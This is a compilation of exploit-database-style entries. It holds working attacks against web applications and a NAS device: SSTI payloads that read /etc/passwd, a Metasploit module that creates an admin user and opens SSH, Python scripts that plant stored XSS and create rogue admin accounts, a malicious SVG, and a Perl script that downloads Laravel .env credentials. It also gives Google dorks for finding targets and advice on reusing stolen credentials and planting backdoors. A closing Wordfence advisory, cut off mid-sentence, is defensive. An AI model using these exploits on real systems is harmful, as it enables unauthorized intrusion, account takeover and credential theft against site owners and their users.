<pre><code># Exploit Title: Sql Injection on one site credentials can be use on other sites<br />- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "<br />- Date: 05/11/2023<br />- Exploit Author: K1LL3rB4LL<br />- Tested on: Mac, Windows, Linux<br /><br />Description:<br /><br />The vulnerability found is an SQL injection. You may run the site thru automated sql injection or manually doing sql injection once the credentials gathered you do your reverse ip to check your other website.<br /><br />Vuln colum count: 5<br />Vuln colum : 3,4<br />Type of Sql : WAF<br />Username: admin<br />Password: 123456<br />admin panel: site.com/admin<br /><br />Details: After gathering information from sql injection from site a site (site A) you may use the said credentials to access other websites on the same ip or with the same developer if you managed to get an access and upload a php script or backdoor. You may access other sites on their public_html or that is connected on their website which share the same server and if your going to look at the sites they share the same common developer. In some sites that don't have the same credentials you still do the same sql injection with the same colum count, vuln colum number and database where they store the admin credentials.<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Jobs Portal V 3.6 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/jobs-portal-job-board-laravel-script/22607607 | <br />| # Dork : "Our partners make Milestone products more dynamic " |<br /> "Vestibulum vel nibh et erat faucibus Category : Jobseekers, General" |<br /> "Design by: eCreativeSolutions" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=buyer@buyer.com & pass=buyer123456 <br /><br />[+] https://localhost.com/admin/edit-site-setting<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)<br />Exploit Author: PARAG BAGUL<br />CVE: CVE-2023-30145<br /><br />## Description<br />Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template<br />Injection (SSTI) vulnerability via the formats parameter.<br /><br />## Affected Component<br />All versions below 2.7.0 are affected.<br /><br />## Author<br />Parag Bagul<br /><br />## Steps to Reproduce<br />1. Open the target URL: `https://target.com/admin/media/upload`<br />2. Upload any file and intercept the request.<br />3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.<br />4. Check the response. It should return the multiplication of 77 with the<br />message "File format not allowed (dqopi49vuuvm)".<br /><br />##Detection:<br /><br />#Request:<br /><br />POST /admin/media/upload?actions=false HTTP/1.1<br />Host: target.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: /<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://target.com/admin/profile/edit<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------327175120238370517612522354688<br />Content-Length: 1200<br />Origin: http://target.com<br />DNT: 1<br />Connection: close<br />Cookie: cookie<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="file_upload"; filename="test.txt"<br />Content-Type: text/plain<br /><br />test<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="versions"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="thumb_size"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="formats"<br /><br />test<%= 7*7 %>test<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="media_formats"<br /><br />image<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="dimension"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="private"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="folder"<br /><br />/<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="skip_auto_crop"<br /><br />true<br />-----------------------------327175120238370517612522354688--<br /><br />#Response:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-8<br />Connection: close<br />Status: 200 OK<br />Cache-Control: max-age=0, private, must-revalidate<br />Set-Cookie: cookie<br />Content-Length: 41<br /><br />File format not allowed (test49test)<br /><br />#Exploitation:<br /><br />To execute a command, add the following payload:<br />testqopi<%= File.open('/etc/passwd').read %>fdtest<br /><br />Request:<br /><br />POST /admin/media/upload?actions=true HTTP/1.1<br />Host: target.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: /<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://target.com/admin/media<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------104219633614133026962934729021<br />Content-Length: 1237<br />Origin: http://target.com<br />DNT: 1<br />Connection: close<br />Cookie: cookie<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="file_upload"; filename="test.txt"<br />Content-Type: text/plain<br /><br />test<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="versions"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="thumb_size"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="formats"<br /><br />dqopi<%= File.open('/etc/passwd').read %>fdfdsf<br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="media_formats"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="dimension"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="private"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="folder"<br /><br />/<br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="skip_auto_crop"<br /><br />true<br />-----------------------------104219633614133026962934729021--<br /><br />Response:<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-8<br />Connection: close<br />Status: 200 OK<br />Set-Cookie: cookie<br />Content-Length: 1816<br /><br />File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />fdfdsf)<br /><br /></code></pre>
<pre><code>##<br /># Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)<br /># Date: Dec 9 2019<br /># Exploit Author: Ege Balci<br /># Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/<br /># Version: 2015.0916<br /># CVE : 2020-6627<br /><br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'net/http'<br />require 'net/ssh'<br />require 'net/ssh/command_stream'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::SSH<br /><br /> def initialize(info={})<br /> super(update_info(info,<br /> 'Name' => "Seagate Central External NAS Arbitrary User Creation",<br /> 'Description' => %q{<br /> This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.<br /> Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state<br /> and register a new admin user which is capable of SSH access.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Ege Balcı <egebalci@pm.me>' # author & msf module<br /> ],<br /> 'References' =><br /> [<br /> ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],<br /> ['CVE', '2020-6627']<br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'SSL' => false,<br /> 'WfsDelay' => 5,<br /> },<br /> 'Platform' => ['unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Payload' =><br /> {<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd_interact',<br /> 'ConnectionType' => 'find'<br /> }<br /> },<br /> 'Targets' =><br /> [<br /> ['Auto',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD<br /> }<br /> ],<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => "Dec 9 2019",<br /> 'DefaultTarget' => 0<br /> ))<br /><br /><br /> register_options(<br /> [<br /> OptString.new('USER', [ true, 'Seagate Central SSH user', '']),<br /> OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])<br /> ], self.class<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),<br /> OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])<br /> ]<br /> )<br /><br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> }<br /> },60)<br /><br /> if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')<br /> Exploit::CheckCode::Appears<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def exploit<br /><br /> # First get current state<br /> first_state=get_state()<br /> if first_state<br /> print_status("Current device state: #{first_state['state']}")<br /> else<br /> return<br /> end<br /><br /> if first_state['state'] != 'start'<br /> # Set new start state<br /> first_state['state'] = 'start'<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "info=#{first_state.to_json}"<br /> },60)<br /><br /> changed_state=get_state()<br /> if changed_state && changed_state['state'] == 'start'<br /> print_good("State successfully changed !")<br /> else<br /> print_error("Could not change device state")<br /> return<br /> end<br /> end<br /><br /> name = Rex::Text.rand_name_male<br /> user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"<br /> pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)<br /><br /> print_status('Creating new admin user...')<br /> print_status("User: #{user}")<br /> print_status("Pass: #{pass}")<br /><br /> # Add new admin user<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}<br /> },60)<br /><br /><br /> conn = do_login(user,pass)<br /> if conn<br /> print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")<br /> handler(conn.lsock)<br /> end<br /><br /> end<br /><br /><br /><br /> def do_login(user, pass)<br /> factory = ssh_socket_factory<br /> opts = {<br /> :auth_methods => ['password', 'keyboard-interactive'],<br /> :port => 22,<br /> :use_agent => false,<br /> :config => false,<br /> :password => pass,<br /> :proxy => factory,<br /> :non_interactive => true,<br /> :verify_host_key => :never<br /> }<br /><br /> opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']<br /><br /> begin<br /> ssh = nil<br /> ::Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> ssh = Net::SSH.start(rhost, user, opts)<br /> end<br /> rescue Rex::ConnectionError<br /> fail_with Failure::Unreachable, 'Connection failed'<br /> rescue Net::SSH::Disconnect, ::EOFError<br /> print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"<br /> return<br /> rescue ::Timeout::Error<br /> print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"<br /> return<br /> rescue Net::SSH::AuthenticationFailed<br /> print_error "#{rhost}:#{rport} SSH - Failed authentication"<br /> rescue Net::SSH::Exception => e<br /> print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"<br /> return<br /> end<br /><br /> if ssh<br /> conn = Net::SSH::CommandStream.new(ssh)<br /> ssh = nil<br /> return conn<br /> end<br /><br /> return nil<br /> end<br /><br /> def get_state<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> }<br /> },60)<br /><br /> if res && (res.code == 200 ||res.code == 100)<br /> return res.get_json_document<br /> end<br /> res = nil<br /> end<br />end<br /> <br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)<br /># Google Dork: intitle:"SCM Manager" intext:1.60<br /># Date: 05-25-2023<br /># Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)<br /># Vendor Homepage: https://scm-manager.org/<br /># Software Link: https://scm-manager.org/docs/1.x/en/getting-started/<br /># Version: 1.2 <= 1.60<br /># Tested on: Debian based<br /># CVE: CVE-2023-33829<br /><br /># Modules<br />import requests<br />import argparse<br />import sys<br /><br /># Main menu<br />parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')<br />parser.add_argument("-u", "--user", help="Admin user or user with write permissions")<br />parser.add_argument("-p", "--password", help="password of the user")<br />args = parser.parse_args()<br /><br /><br /># Credentials<br />user = sys.argv[2]<br />password = sys.argv[4]<br /><br /><br /># Global Variables<br />main_url = "http://localhost:8080/scm" # Change URL if its necessary<br />auth_url = main_url + "/api/rest/authentication/login.json"<br />users = main_url + "/api/rest/users.json"<br />groups = main_url + "/api/rest/groups.json"<br />repos = main_url + "/api/rest/repositories.json"<br /><br /># Create a session<br />session = requests.Session()<br /><br /># Credentials to send<br />post_data={<br /> 'username': user, # change if you have any other user with write permissions<br /> 'password': password # change if you have any other user with write permissions<br />}<br /><br />r = session.post(auth_url, data=post_data)<br /><br />if r.status_code == 200:<br /> print("[+] Authentication successfully")<br />else:<br /> print("[-] Failed to authenticate")<br /> sys.exit(1)<br /><br />new_user={<br /><br /> "name": "newUser",<br /> "displayName": "<img src=x onerror=alert('XSS')>",<br /> "mail": "",<br /> "password": "",<br /> "admin": False,<br /> "active": True,<br /> "type": "xml"<br /><br />}<br /><br />create_user = session.post(users, json=new_user)<br />print("[+] User with XSS Payload created")<br /><br />new_group={<br /><br /> "name": "newGroup",<br /> "description": "<img src=x onerror=alert('XSS')>",<br /> "type": "xml"<br /><br />}<br /><br />create_group = session.post(groups, json=new_group)<br />print("[+] Group with XSS Payload created")<br /><br />new_repo={<br /><br /> "name": "newRepo",<br /> "type": "svn",<br /> "contact": "",<br /> "description": "<img src=x onerror=alert('XSS')>",<br /> "public": False<br /><br />}<br /><br />create_repo = session.post(repos, json=new_repo)<br />print("[+] Repository with XSS Payload created")<br /> <br /><br /></code></pre>
<pre><code>#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: create admin user via mass assignment<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna<br /><br />import requests<br /><br />new_name=input("name: ")<br />new_email=input("email: ")<br />new_pass=input("password: ")<br /><br />url = "http://localhost/dist/admin/index.php"<br /><br />headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /><br />data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="<br /><br />response = requests.post(url, headers=headers, data=data)<br /><br />if response.status_code == 200:<br /> print("Request is success and created new admin account")<br /> <br />else:<br /> print("Request is failure.!!")<br /> <br /> <br />#POC video : https://youtu.be/SCkRJzJ0FVk<br /><br /></code></pre>
<pre><code>Exploit Title: Zenphoto 1.6 - Multiple stored XSS<br />Application: Zenphoto-1.6 xss poc<br />Version: 1.6 <br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/<br />Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip<br />Date of found: 01-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />###XSS-1###<br />steps: <br />1. create new album <br />2. write Album Description : <iframe src="https://14.rs"></iframe> <br />3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/<br /><br />=====================================================<br />###XSS-2###<br />steps: <br />1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)<br />2.change postal code as <script>alert(4)</script><br />3.if admin user information import as html , xss will trigger<br /><br />poc video : https://youtu.be/JKdC980ZbLY<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : db_password filetype:env |<br /> "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />note : <br /><br />[+] 1 : <br /> <br />Laravel's default .env file contains some common configuration values that may differ based on whether your application <br />is running locally or on a production web server. These values are then retrieved from various Laravel configuration files <br />within the config directory using Laravel's env function.<br /><br />[+] 2 : This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc<br /><br />[+] Poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )<br /><br />[+] https://127.0.0.1/lala/.env <br /><br />====================================================================================================================================<br />| # Title : Laravel 10.11 sensitive information disclosure Vulnerability |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] https://127.0.0.1/lalaland/categorie/avant_apres/<br /><br />[+] https://youtu.be/tz_w563Nyac <br /><br />====================================================================================================================================<br />| # Title : Laravel 10.11 Database Disclosure Exploit |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the configuration file:<br /><br /> The following Perl exploit will attempt to download the .env file<br /> The .env file contains some common configuration values and connection information to the script database<br /> Through the code you can control where to save the downloaded file .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/.env \n";<br />print "[+] usage2 : perl $0 localhost /.env \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File=".env";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/.env");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)<br />Version: 1.6.1<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://wbce-cms.org/<br />Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1<br />Date of found: 03-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />###XSS-1###<br />steps: <br /><br />1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)<br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br />POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1<br />Host: localhost<br />Content-Length: 976<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-platform: "Linux"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167<br />Connection: close<br /><br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="reqid"<br /><br />187de34ea92ac<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="cmd"<br /><br />upload<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="target"<br /><br />l1_Lw<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="mtime[]"<br /><br />1683056102<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO--<br /><br /><br />3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)<br /><br /><br /><br />========================================================================================================================<br /><br />###XSS-2###<br /><br />1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)<br />2. add page<br />3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)<br />payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E<br />poc request:<br /><br />POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1<br />Host: localhost<br />Content-Length: 143<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475<br />Connection: close<br /><br />page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save<br /><br /><br />4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php<br /><br /></code></pre>
<pre><code>Description: Beautiful Cookie Consent Banner <= 2.10.1 - Unauthenticated Stored Cross-Site Scripting <br /><br />Affected Plugin:Beautiful Cookie Consent Banner<br /><br />Plugin Slug: beautiful-and-responsive-cookie-consent<br /><br />Affected Versions: <= 2.10.1<br /><br />CVE ID: Not Assigned<br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Unknown<br /><br />Fully Patched Version: 2.10.2<br /><br />The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A partial patch was made available in 2.10.1 and the issue was fully patched in 2.10.2.<br /><br />The Attacks<br /><br />According to our records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that we have seen. We have blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.<br /><br />Cookie consent attacks chart <br /><br />Pictured: A chart showing sites attacked and total attacks targeting this vulnerability<br /><br />We believe that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.<br /><br />Despite this fact, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks do have the potential to corrupt the configuration of the plugin which can break its intended functionality, so we still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.<br /><br />Indicators of Compromise<br /><br />Requests<br /><br />example request <br /><br />An example request showing the payload being used<br /><br />POST requests to /wp-admin/admin-post.php from unrecognized IP addresses may appear in your server logs, or in your Live Traffic if you have the Wordfence plugin installed.<br /><br />IP Addresses<br /><br />We have included the top 20 attacking IP addresses, though there are many more:<br /><br />- 209.126.12.142<br />- 101.34.223.139<br />- 92.204.37.157<br />- 66.37.4.138<br />- 92.205.48.232<br />- 212.237.233.32<br />- 195.201.82.166<br />- 67.205.58.212<br />- 51.38.27.102<br />- 173.236.213.148<br />- 207.244.241.230<br />- 74.208.177.185<br />- 92.204.33.117<br />- 134.119.0.186<br />- 5.9.238.21<br />- 92.205.64.149<br />- 94.158.149.174<br />- 173.236.215.161<br />- 92.205.48.177<br />- 190.54.62.76<br /><br />If your site was impacted by this or an earlier attack campaign, it may have corrupted the ​​nsc_bar_bannersettings_json option in your database. The plugin's developers have included functionality in patched versions to repair any changes made as a result of this exploit.<br /><br />Conclusion<br /><br />In today’s article, we covered an uptick in attacks targeting a patched vulnerability in Beautiful Cookie Consent Banner.<br /><br />All Wordfence sites, including those running Wordfence Free, Wordfence Premium, Wordfence Care, and Wordfence Response, are protected against this 